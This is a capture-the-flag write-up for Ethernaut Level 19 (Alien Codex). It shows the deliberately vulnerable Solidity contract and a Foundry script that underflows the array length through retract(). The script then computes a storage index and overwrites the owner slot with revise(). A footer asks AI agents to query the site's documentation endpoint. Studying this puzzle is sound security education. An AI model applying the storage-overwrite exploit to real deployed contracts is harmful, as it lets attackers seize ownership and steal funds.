# Level 19 - Alien Codex ⏺⏺⏺⏺ {% embed url="" %} ### Level Setup {% hint style="info" %} You've uncovered an Alien contract. Claim ownership to complete the level. Things that might help * Understanding how array storage works * Understanding [ABI specifications](https://solidity.readthedocs.io/en/v0.4.21/abi-spec.html) * Using a very `underhanded` approach {% endhint %} ### Level Contract {% embed url="" %} {% code lineNumbers="true" fullWidth="true" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.5.0; import "../helpers/Ownable-05.sol"; contract AlienCodex is Ownable { bool public contact; bytes32[] public codex; modifier contacted() { assert(contact); _; } function makeContact() public { contact = true; } function record(bytes32 _content) public contacted { codex.push(_content); } function retract() public contacted { codex.length--; } function revise(uint256 i, bytes32 _content) public contacted { codex[i] = _content; } } ``` {% endcode %} ### Exploit {% tabs %} {% tab title="Anvil" %} ```bash make anvil-exploit-level-19 ``` {% endtab %} {% tab title="Holesky" %} ```bash make holesky-exploit-level-19 ``` {% endtab %} {% endtabs %} {% tabs %} {% tab title="Exploit Deployment Script" %} {% embed url="" %} {% code title="script/Level19.s.sol" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import {Script, console} from "forge-std/Script.sol"; import {HelperFunctions} from "script/HelperFunctions.s.sol"; // ================================================================ // │ LEVEL 19 - ALIEN CODEX │ // ================================================================ interface IAlienCodex { function makeContact() external; function retract() external; function revise(uint256 i, bytes32 _content) external; } contract Exploit is Script, HelperFunctions { function run() public { address targetContractAddress = getInstanceAddress(); IAlienCodex alienCodex = IAlienCodex(targetContractAddress); vm.startBroadcast(); // Make contact with the alien codex alienCodex.makeContact(); // Retract the codex length by 1, causing an underflow alienCodex.retract(); // Calculate the index in the array where the owner is stored uint256 arraySlot = uint256(keccak256(abi.encodePacked(uint256(1)))); uint256 ownerSlot = 0; uint256 indexToModify = type(uint256).max - arraySlot + ownerSlot + 1; // Overwrite the owner with msg.sender alienCodex.revise(indexToModify, bytes32(uint256(uint160(msg.sender)))); vm.stopBroadcast(); } } ``` {% endcode %} {% endtab %} {% endtabs %} Submit instance... 🥳 ### Completion Message {% hint style="info" %} This level exploits the fact that the EVM doesn't validate an array's ABI-encoded length vs its actual payload. Additionally, it exploits the arithmetic underflow of array length, by expanding the array's bounds to the entire storage area of `2^256`. The user is then able to modify all contract storage. Both vulnerabilities are inspired by 2017's [Underhanded coding contest](https://medium.com/@weka/announcing-the-winners-of-the-first-underhanded-solidity-coding-contest-282563a87079) {% endhint %} ### Notes {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.eridian.xyz/ethereum-dev/defi-challenges/ethernaut/level-19-alien-codex.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.